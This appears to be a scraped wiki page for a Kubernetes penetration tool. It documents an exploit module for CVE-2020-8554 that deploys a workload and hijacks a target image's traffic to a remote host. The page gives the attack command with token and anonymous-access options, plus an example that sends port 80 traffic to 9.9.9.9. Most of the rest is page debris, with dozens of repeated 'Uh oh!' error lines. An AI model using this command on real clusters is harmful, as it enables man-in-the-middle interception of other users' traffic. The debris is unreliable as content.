Evaluate: k8s mitm clusterip

Exploit: k8s-mitm-clusterip

Exploit CVE-2020-8554: Man in the middle using ExternalIPs.

K8s中间人攻击(CVE-2020-8554)

See more in https://unit42.paloaltonetworks.com/cve-2020-8554/

Usage

First it will deploy in cluster, then create a service to hijack its traffic and send to remote :

cdk run k8s-mitm-clusterip (default|anonymous|<service-account-token-path>) <image> <ip> <port>

Request Options:
default: connect API server with pod's default service account token
anonymous: connect API server with user system:anonymous
<service-account-token-path>: connect API server with user-specified service account token.

Exploit Options:
image: target image to MITM hijack.
ip: the remote IP to receive hijack traffic.
port: send container:PORT traffic to remote IP:PORT

Example

deploy image ubuntu in cluster and hijack its traffic from port 80 to remote 9.9.9.9:80

./cdk run k8s-mitm-clusterip default ubuntu 9.9.9.9 80

Evaluate: k8s mitm clusterip

Exploit: k8s-mitm-clusterip

Usage

Example

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Clone this wiki locally